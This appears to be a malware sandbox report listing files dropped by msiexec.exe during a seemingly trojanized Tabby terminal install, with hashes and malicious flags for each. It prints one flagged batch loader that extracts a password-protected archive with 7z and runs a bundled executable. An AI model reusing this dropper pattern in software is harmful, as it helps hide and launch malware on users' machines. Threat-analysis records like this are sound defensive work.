                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:DD8qint0wME1/o/7Ng0Hkp3+UNoqFtnjO5Jmr40nIw6PZgHu:D4vthMsy7EpPoqTnjO5IrbnjO
                                                                                                                                                                                          MD5:1EFB37FAA54DA5A7D9FE694FEE7D5E4E
                                                                                                                                                                                          SHA1:497F6E0FB9DC099DFD8E107570FEBE9D0A6EBC2D
                                                                                                                                                                                          SHA-256:77AA01763C114B75A83DE3C34C60497B1CA23C98523F58A43C76AAE7380AB3B6
                                                                                                                                                                                          SHA-512:FACC41943159DAD7541F5D50B8216F6CCF02703A983DD81120F387DDEA70D502F5D66C275F80267C7A3B1EB9F1C751A4EC3B307D03F872BE4237366637BB829A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):493540
                                                                                                                                                                                          Entropy (8bit):5.454116761923621
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:+pQdZQe2AH5hJ1HNR5yyX+DuH/Fb0WmFosS4Eqsoh7Pwiw5dQH57jnMlvCKMvaKL:+yZ92ejyyIuJmFoszwQH57jUW
                                                                                                                                                                                          MD5:78A8A4956B1CD09124B448985A839F28
                                                                                                                                                                                          SHA1:A25BCAB44ED12DD0DD643AA6782903B22B84816B
                                                                                                                                                                                          SHA-256:AC1431E61F8C6C56EF96860DC8A8DDF840DBF6965AF6B920D811B7E39ADAB6B1
                                                                                                                                                                                          SHA-512:843BAFCE3E528BA98A3FF537B01D7896F83C22C0AD2E43BBCE83381FAA943D74D7B11B419DAAC0B0F57DE30D5792E3262DEFE9C68F5F4C7CA84B173395D14798
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):808052
                                                                                                                                                                                          Entropy (8bit):5.022679220176124
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:Jap2Eq8u313uyqoT+s7q+NRmX1loT4RmdAQifaQ2XxFMJGk620driUHMX9O9xdpW:sUjJ5SV
                                                                                                                                                                                          MD5:6C6C939CBCE5A9AE6B6A89B9DC1B14CD
                                                                                                                                                                                          SHA1:8674B02FB2A11BA6664427C78401D261DCEC859C
                                                                                                                                                                                          SHA-256:D77AADACDB5B72345C68590ECE6463EFCDD4E8817FE3DEDAD98D64F132B8E48F
                                                                                                                                                                                          SHA-512:3CF8ECCAC20108550C2A7758531AE992D72AA23396ABDFD38E613ED26FC755FA33385B4538DCE9E19309B622973CA6D4C0FEEEDC7064DF9BB12419DFC630D545
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):504052
                                                                                                                                                                                          Entropy (8bit):5.421469618205756
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:/aVXt4D7SmA19ub5KuOar5yZ7kfCHEpyWaM7OYM:/64D7Smll5yFHZl
                                                                                                                                                                                          MD5:83DEC7D70140F96E780BCA0E97EB3DFA
                                                                                                                                                                                          SHA1:E0C9891241D88716419F476BB193ADA5D8606EB1
                                                                                                                                                                                          SHA-256:AE902AB57A1325D4F0A0A1C69790F28F5E49B5671A99C4C315367B4425D1DE97
                                                                                                                                                                                          SHA-512:7B1851C2476290DBDE7DCBEFBE75F89041EC185DC4354DB55FFE2DA588E17363403921EEAF9FD26EBA8EB4DE3BF99876339DE1DD4219EC6F5E2EA3679B90BE71
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):569703
                                                                                                                                                                                          Entropy (8bit):5.1919702904490395
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:aZdptKHeHQogDYIQy7DQEuH2V8L0dnGNLmG5IXmr1YARQqK:odM5kxEG5mmg
                                                                                                                                                                                          MD5:E499AF17FCE1F7F276B3BFB0E1B2F5B2
                                                                                                                                                                                          SHA1:E2BF18ACF2A9E357AA7A694B5C60F947FD8BB0C2
                                                                                                                                                                                          SHA-256:A30015021FB928BCF16F9409FB45FB89CA3D196BAFB3597DF3FE4A9E477A3FD9
                                                                                                                                                                                          SHA-512:A1F03B7A6EC3F4601052D4E1F2CA6C092D9E5FE41CE7DF89F7E7FBE1A1892DF73A9CB85058F3C24E1236ED013E2BDD017F7BEC3D6B6FF13CA61BF0849C73F472
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):587932
                                                                                                                                                                                          Entropy (8bit):5.385302506831163
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:3OjnZLqxMDpDgEL6QuaMVWXKz05FlZQmZyMYnYtzLl9ujzx4e5hxkJSW7v40wCJY:3Okm2VqN5Q7
                                                                                                                                                                                          MD5:606E583292DBEAE8A3742A700D09E1C2
                                                                                                                                                                                          SHA1:BF49B446173BA81EC3F926D69B87A81C5E233C4E
                                                                                                                                                                                          SHA-256:C22E274FBC4A033CB8A9A4E9A96F82487DC671EC0AD49B3257939D2A8A751442
                                                                                                                                                                                          SHA-512:47277EDBFB2DCE8724900C0A7B0231E34DEEE19B268F46C08D56ADECAD38D629D79466C26B701B6F43607F7DCDE55B1BBF6C3D73BDBD7E22096A0D14AD901621
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1148544
                                                                                                                                                                                          Entropy (8bit):4.309990877698155
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:A4TQMBc+YPbBMDBW6bfrBDNOHIwjAwREJKVMjNiT7llj63rFXlPCpMi5eWWiMJsr:A4THSPbr6bvMa/+c5q4hNkFR
                                                                                                                                                                                          MD5:DBC465E12C921212C1A3E899E5FD5046
                                                                                                                                                                                          SHA1:F6F7081E622DF0FC9647DCE0572483899A59E440
                                                                                                                                                                                          SHA-256:7B06F3B7040901E7DBD2884BA534D43E73013CE0677BC725D53BCCD54759AD5E
                                                                                                                                                                                          SHA-512:9C3F3E7E7A62A0148789F561C37144F971ECC16C44A4F5A89214CBD7FADE0E1D2CCCD5C106C4718DF84A198262EF139A6530C400F5C0873231009E8B432BD3BC
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):453011
                                                                                                                                                                                          Entropy (8bit):6.676159403780886
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:1K2A4c8ADmJUHGF2tuDasg5V5gjkzBMOZQyZV7zeXTA:8Z8Ahwasg5V5gjkzpr/7/
                                                                                                                                                                                          MD5:D6800784F1138702E4973CC5B074FE6C
                                                                                                                                                                                          SHA1:A8938CED7FE5A35163C28214EADD96A6F63A8666
                                                                                                                                                                                          SHA-256:D2C4AEC734BC94FBE7D60666343B4E419BE5E2CD1FF445A8BBF14FB4B8D3D715
                                                                                                                                                                                          SHA-512:3AD3557908E4BA71A5062AB0BE07832D553E6A3BD56BDD59A719DF65A4D9152950AF2DE25C6C410B6407463A862C92D49E9D0EE863BEF27A792AA128458FC7E7
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):100
                                                                                                                                                                                          Entropy (8bit):4.593598756557746
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:mKDDFAR93Y+33BA5sLdFg3cITYCSHT225di8AE:hmR93Y+HBcjMIyieF
                                                                                                                                                                                          MD5:F5E7767D02BA2B58DCB57837E159D9A1
                                                                                                                                                                                          SHA1:7E94ACC3CFF992C94C07723DB1E5C6C1FE9C1B8F
                                                                                                                                                                                          SHA-256:2881E779833B832A966AE2F0D25DD0E8CAF20AFD1E524B0D489FED35690175A9
                                                                                                                                                                                          SHA-512:E0ED9CD697215E620AEBE6554F360F85356D6ACAC9356FD0170C4A95F2E6E00BC80C5440E80E26CF2D1F6CD2CE70B074DC72E3E7FF0D876947B191B2C474B1D3
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                          Preview:@echo off..set "dd=%~1"...."%dd%\7z.exe" x "%dd%\jp_ver.dat" -o"%dd%" -y -p%2.."%dd%\mksSandbox.exe"
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4403320
                                                                                                                                                                                          Entropy (8bit):6.249719197874481
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:tQLMLy+5/ij+7ksNuCo7cMnTbpe/DGn/xUTHj8xUNDQePSiTivHn3Vv+ohiKGURZ:8A7kOTMnoGn//Y+vF+ohiKvReYBdFFX
                                                                                                                                                                                          MD5:32D4F18844BB58AD0EDED3931CB4022F
                                                                                                                                                                                          SHA1:5C15385CF2ED20AA345057D4B647ED2C0CB58CA8
                                                                                                                                                                                          SHA-256:24B08EDA5DA534A3389718241DB384B7BDFA3FDCD6AD126D03B436069E2AE845
                                                                                                                                                                                          SHA-512:086575C96B4580407175970AEE915961B323426CF1946D91852FF0141869DD6E8BA99FDB1846F4FD8382A2E1D15EC0E01DC5050CDDAA2B525EEEA3905D4A8866
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):210
                                                                                                                                                                                          Entropy (8bit):5.084818975749688
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:oDSE8Uy2MTTxuNXbGtsQcNzVKR9/WQnUHt5n:CSEFWTENXEVcNu/lnUf
                                                                                                                                                                                          MD5:4A33CA4B60DCD4497A280F1065B8DABC
                                                                                                                                                                                          SHA1:62AC4A83E85E479D8D8EC162F727D763EC0C74AF
                                                                                                                                                                                          SHA-256:2F038A5A295DD7C97A395D1A963F5AE2C3EE12A2746CF69A5D78E2B4518072C3
                                                                                                                                                                                          SHA-512:0E98625BF04287A67720414ACC29223C8FC8A0EC08E050146CA1DFB1A8F926C38FBEFD956F5BF101071B09BDB1E097B7CEE57F258A550E1D9AC8D16171CB25AB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:provider: keygen.account: a06315f2-1031-47c6-9181-e92a20ec815e.channel: stable.product: f481b9d6-d5da-4970-b926-f515373e986f.platform: windows.updaterCacheDirName: tabby-updater.publisherName:. - syslink GmbH.
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):128816
                                                                                                                                                                                          Entropy (8bit):6.77295089794811
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:m/bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWle6LeY7E:cPrwRhte1XsE1ll7E
                                                                                                                                                                                          MD5:31EC4BF51C97B56D1B47C34D8FE73309
                                                                                                                                                                                          SHA1:F63F1B04797A1B859D25F43574EFE45AB6FD5B49
                                                                                                                                                                                          SHA-256:F1C102ADE129D4D96591AAFADD4679A13BF1BDD9980206EC6B18357FD931B907
                                                                                                                                                                                          SHA-512:3232C06EBE260F6B23A08BB14C273DFFD591337380ADAA5EDD98A5E41386007793401AA3FF15FA199AFC5ED7A307D26A860C83BF32261252641189DF5FDEB744
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):52528
                                                                                                                                                                                          Entropy (8bit):6.751675110373434
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:ui7+7A/h70Lp3sXaiXU9WBb1sYUG6EpYinAMxOYBGRCYigYBGF73iPmbLF:8pgKabVUG77HxVGRC7DGN79
                                                                                                                                                                                          MD5:D65D5A556D2A056B0E3D3A9959BC0D8C
                                                                                                                                                                                          SHA1:A8A45A2D49FC97CBC1ABA6BD30DE9DA5A30F0745
                                                                                                                                                                                          SHA-256:7B0F01CCA4914EEC757CBA4A0643A6491CA8F735AB6003D88EE598E26BF30FDF
                                                                                                                                                                                          SHA-512:22A36C7DD83BF4BC2814D8A7021759CAC01A33C126DBB4192C92DD98CF5C2974AB754DD11DA14E5230E60A3740D205F46A4D88D8B2043FE565C4C544F1CB5577
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):796
                                                                                                                                                                                          Entropy (8bit):5.091066359784689
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:TMHd4+tJVEdQsv9SvS2e1XDMCnBiYlkCmak0nWMtn7g4QGCkaQAHn6nEtZL7egw:2d6ysv3r1RBi1ak0nx7HQQaqsvRw
                                                                                                                                                                                          MD5:E43AFFCF9D485CD8E137E9FBF1566F6A
                                                                                                                                                                                          SHA1:DB7BDB358D2E5A27AB13304860F96E3545C253A8
                                                                                                                                                                                          SHA-256:D2D2FBDE613F8BB5790A42682B228D18D0D19CF9731D7F9F1FE98FF5BF4AE704
                                                                                                                                                                                          SHA-512:0658C786DC969B9C216FFC4A636160CC3D4AB6EA21FD75A3235C0FB93C0EF8C820C2E522E936AA602F39387D45518066DB25D8EFBC417F58C7836F36816E5E37
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>NSServices</key>...<array>....<dict>.....<key>NSBackgroundColorName</key>.....<string>background</string>.....<key>NSIconName</key>.....<string>NSActionTemplate</string>.....<key>NSMenuItem</key>.....<dict>......<key>default</key>......<string>Open Tabby here</string>.....</dict>.....<key>NSMessage</key>.....<string>runWorkflowAsService</string>.....<key>NSRequiredContext</key>.....<dict>......<key>NSApplicationIdentifier</key>......<string>com.apple.finder</string>.....</dict>.....<key>NSSendFileTypes</key>.....<array>......<string>public.item</string>.....</array>....</dict>...</array>..</dict>..</plist>..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PNG image data, 28 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3730
                                                                                                                                                                                          Entropy (8bit):7.935179648465286
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:3uYzgziKENNlTOLOcmbUVRImS7JCUP3YMGYvoAzap:3uqKKtVbcWmS7lP38YRM
                                                                                                                                                                                          MD5:230BEC0E3D1F23A98ABFF47A25880762
                                                                                                                                                                                          SHA1:B6FD10B60A3CCD9F7EB103D00CD74A2479BB8DE4
                                                                                                                                                                                          SHA-256:F2795F9C16E439171A9BD704F382AEC4CF4B81FEA1614D237A17A95FCB123435
                                                                                                                                                                                          SHA-512:FFFAD79EDDF1198BFD43AB334EB2CF07E8C4612D1F8DFADDF5563129D381C17D4C58D8586FC3628163DEA5B3B91B4E9DE8F912CC23A0213D9C1E00E7F6166DBD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Mac OS X Code Directory version 20200 - 162 bytes
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):162
                                                                                                                                                                                          Entropy (8bit):5.459232647646292
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:99/lf/8llLxs/e0l9kbXbP6baYtU4VRwBFbTBn:+llxs/e08bXz6by4HwBFbTBn
                                                                                                                                                                                          MD5:906FCCB4C457F96F5F773CED6B743270
                                                                                                                                                                                          SHA1:1CE2B5D56352C00611F88120F1C2D5E97E345A2E
                                                                                                                                                                                          SHA-256:5B9CD21B3778C6A9E17F9DECBC986923CE4BA15B6EAF8746BD5FEA5BE3099AC8
                                                                                                                                                                                          SHA-512:221F2C3FCAC246E27CBEF5D22FD8CBEB5B3EF94F9B46316CA5843703172C0D87DFC02D731256E4F87841DE1524F6B8C72C537E070FEFDB08EC5EBDD387244582
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.......................4...........................GOpen Terminus here.V4JSMC46SY.....;.].<..=..}L.m>..i.3..Hz:.6j..{K......=9..N.p}....x#..b...=9..N.p}....x#..b.
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Mac OS X Code Requirement Set - 180 bytes
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):180
                                                                                                                                                                                          Entropy (8bit):3.5492555581720207
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:+ZEulB9FWRlFaVA3Wl/lljYNuPRuMFxuu//ul/Ll/Uk5b/:+ZEuDWD4VAm13ove/q/Ll/v5b/
                                                                                                                                                                                          MD5:D1381896FD6ABAEE339F7099BF972FAD
                                                                                                                                                                                          SHA1:EC69DD33C0FD487A3AB1366AB3A27B4BFA1CA4B1
                                                                                                                                                                                          SHA-256:4229959813B441C9037FE7457CA7FB722EB4AEDC5D69D55911E3F4753B297335
                                                                                                                                                                                          SHA-512:7B806CB538390AB62A7CF3AF6E4BC76C5445327E97F6CFF0CAD6F90B4114E5524D4A8954A554A15BBC4C4913C9BDA1B01B9E0E3B6D2E0ABF54EE74EBA0618FB0
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:............................................Open Terminus here..........................*.H..cd.........................*.H..cd.....................subject.OU..........V4JSMC46SY..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Mac OS X Code Directory version 20200 - 210 bytes
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):210
                                                                                                                                                                                          Entropy (8bit):5.906846162722358
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:9N/lD/8llLFltlm0l9kbe3iErfPhSj2vwcCYDZ9mBbhXDVZWMBbhXDVZn:yllFA08bXaIjFcCYl929zvWA9zvn
                                                                                                                                                                                          MD5:B02F322820A14092104F00C754F3CFB1
                                                                                                                                                                                          SHA1:690B15ED915483C40068FFECB0F7E27276B6F10A
                                                                                                                                                                                          SHA-256:79736C312EEEFCD43AA55135348EC052F39039CFD0742B22D7BD4422210876E4
                                                                                                                                                                                          SHA-512:16968523918A9357A29E1A627D6707694C309FD5ACA421779FF5EE7983FABC588F52E7002506E5218FCBB0575A58268E6327560DC422D98C3A0C83FFEA192C0C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.......................4............ ..............GOpen Terminus here.V4JSMC46SY./.?.~.*....9?....)..t..D.L...B)....A....E|..r....]i.Y...u;)s5.6..vK.r.N....'......-E..5.fl...6..vK.r.N....'......-E..5.fl..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2949
                                                                                                                                                                                          Entropy (8bit):5.068788614562225
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:c6ys/eV51a2mFOyvQ75tCejztiOUH7m1yvQ7pfS1:9ysQ0Qzz7+
                                                                                                                                                                                          MD5:4BA3A4738791004CEC877840B28C9437
                                                                                                                                                                                          SHA1:A5B9CF6BB738A321EED2182D83F4F1BAE7B8BAAA
                                                                                                                                                                                          SHA-256:1EB4B1B391B1AFF36CD19F45BDA0C3515BE38D182DD5ED68D61B2AFE7E33F208
                                                                                                                                                                                          SHA-512:8EEA7079152B074312152829659489E9EC7F16292794ED990F65EEF978DBF39CEAC978DECF5BAED34681B3D43ED7C44BE4D4A0D5FA29C803FAD92091B997E91D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>files</key>...<dict/>...<key>files2</key>...<dict>....<key>QuickLook/Thumbnail.png</key>....<dict>.....<key>hash</key>.....<data>.....tv0Qtgo8zZ9+sQPQDNdKJHm7jeQ=.....</data>.....<key>hash2</key>.....<data>.....8nlfnBbkORcam9cE84KuxM9Lgf6hYU0jehepX8sSNDU=.....</data>....</dict>....<key>document.wflow</key>....<dict>.....<key>cdhash</key>.....<data>.....VK77ipNZktBsDCcUfnfht774juM=.....</data>.....<key>requirement</key>.....<string>identifier document and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = V4JSMC46SY</string>....</dict>...</dict>...<key>rules</key>...<dict>....<key>^Resources/</key>....<true/>....<key>^Resources/.*\.lproj/</key>....<dict>.....<key>optional</key
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):9042
                                                                                                                                                                                          Entropy (8bit):7.3564290051807415
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:izr+RjG8P03zrA/znSzrMUXFW/3rWEWp7KSrv75alZ8P09rCO:Wr+Q8GrqGrxXFwrWTOSrNab8erCO
                                                                                                                                                                                          MD5:2AE043DCE783BD866C6171A0128D8782
                                                                                                                                                                                          SHA1:8198341553D5F2F3AD14EFCDDFA359304BC49C56
                                                                                                                                                                                          SHA-256:1ED401E7A12847C8D11736C6301EB28CE30E7CD4C5A364E5E4BC37A2BA1B98C6
                                                                                                                                                                                          SHA-512:250666500FCEA4715B13F2FFCEC62262CA62D46E654DF18557B7F4A18B01F8914344C4BE4F686A2E935E04C190AF6A498A9E097F1B36BDD3A00384D12249FC3D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):6214
                                                                                                                                                                                          Entropy (8bit):4.808042356233671
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:9ys1ED/+eoxVCfSSRlG9UblpTADqnuZtJkSz:Is1EDGeoxVCfdLjRanXz
                                                                                                                                                                                          MD5:8C6AD3667294B0074F19A07D1594AB26
                                                                                                                                                                                          SHA1:841B7AEF0F650EB1CE4A6B6A71141D237D128EEC
                                                                                                                                                                                          SHA-256:C3D7487A82DFCAA325B82A237D29D1F1F67701711CD7EFA92B2A1383742ABD0C
                                                                                                                                                                                          SHA-512:BA464A226F3ED29052382F09A8C912D45395C381ACA761A1E72F63151D7059E3B304BE09D5D98689741B5633ABC76FAE7314A22C6C7E77C183AE6186D01C0176
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>AMApplicationBuild</key>...<string>444.38</string>...<key>AMApplicationVersion</key>...<string>2.9</string>...<key>AMDocumentVersion</key>...<string>2</string>...<key>actions</key>...<array>....<dict>.....<key>action</key>.....<dict>......<key>AMAccepts</key>......<dict>.......<key>Container</key>.......<string>List</string>.......<key>Optional</key>.......<true/>.......<key>Types</key>.......<array>........<string>com.apple.cocoa.string</string>.......</array>......</dict>......<key>AMActionVersion</key>......<string>2.0.3</string>......<key>AMApplication</key>......<array>.......<string>Automator</string>......</array>......<key>AMParameterProperties</key>......<dict>.......<key>COMMAND_STRING</key>.......<dict/>.......<key>CheckedForUserDefaultShell</key>.......<dict/>.......<key>inputMethod</key>.......<
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):802
                                                                                                                                                                                          Entropy (8bit):5.091271715917414
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:TMHd4+tJVEdQsv9SvS2e1XDMCnBiYlkCmak0WOtn7g4QGCkaQAHn6nEtZL7egw:2d6ysv3r1RBi1ak0Wi7HQQaqsvRw
                                                                                                                                                                                          MD5:B86FE0AA21FDBEBEAA969B16A0C35EB2
                                                                                                                                                                                          SHA1:689A5603C74F85035F9633526FA5D3B4D156FB03
                                                                                                                                                                                          SHA-256:73C360A27C552EC4C0BBA78B8E1B8179F64D2102D9D08B7AEE03874CD6C2C0AB
                                                                                                                                                                                          SHA-512:9D0BEAC7F35A4B371CDE92C19A6308437AF0C92227E438E02AE48F11299AA60ED09F26D08B5E874119E6962E1CE958E7ECDCACE82FCD23A7E151B266466CE1D8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>NSServices</key>...<array>....<dict>.....<key>NSBackgroundColorName</key>.....<string>background</string>.....<key>NSIconName</key>.....<string>NSActionTemplate</string>.....<key>NSMenuItem</key>.....<dict>......<key>default</key>......<string>Paste path into Tabby</string>.....</dict>.....<key>NSMessage</key>.....<string>runWorkflowAsService</string>.....<key>NSRequiredContext</key>.....<dict>......<key>NSApplicationIdentifier</key>......<string>com.apple.finder</string>.....</dict>.....<key>NSSendFileTypes</key>.....<array>......<string>public.item</string>.....</array>....</dict>...</array>..</dict>..</plist>..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PNG image data, 28 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3730
                                                                                                                                                                                          Entropy (8bit):7.935179648465286
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:3uYzgziKENNlTOLOcmbUVRImS7JCUP3YMGYvoAzap:3uqKKtVbcWmS7lP38YRM
                                                                                                                                                                                          MD5:230BEC0E3D1F23A98ABFF47A25880762
                                                                                                                                                                                          SHA1:B6FD10B60A3CCD9F7EB103D00CD74A2479BB8DE4
                                                                                                                                                                                          SHA-256:F2795F9C16E439171A9BD704F382AEC4CF4B81FEA1614D237A17A95FCB123435
                                                                                                                                                                                          SHA-512:FFFAD79EDDF1198BFD43AB334EB2CF07E8C4612D1F8DFADDF5563129D381C17D4C58D8586FC3628163DEA5B3B91B4E9DE8F912CC23A0213D9C1E00E7F6166DBD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Mac OS X Code Directory version 20200 - 168 bytes
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):168
                                                                                                                                                                                          Entropy (8bit):5.538386794634935
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:93tFUllNxs/lTWgSFkIKT25bxdRXdaTMGQeYQ2WT8qZEd22TTWT8qZEdn:uljxs/RW9FkNT8bxdRNm/QM2WQiEd2U/
                                                                                                                                                                                          MD5:32B4DF0B3437BBFEA6190D209EBD4284
                                                                                                                                                                                          SHA1:12204053AC58B1805B898D66574E1F9A7F5F4806
                                                                                                                                                                                          SHA-256:8F1F910BE854CD75B84E9EA641A36DC788DABC2FEC647FD64689B75079A520EA
                                                                                                                                                                                          SHA-512:38BE9650C5DE3BB46C5C724CCE53BB8055150D10447206880A54BB10701B6148800F105BBC3799BFD62FC98BCBF8126CC9A8B3B67DFBA7529CFB2607A569D731
                                                                                                                                                                                          Malicious:false
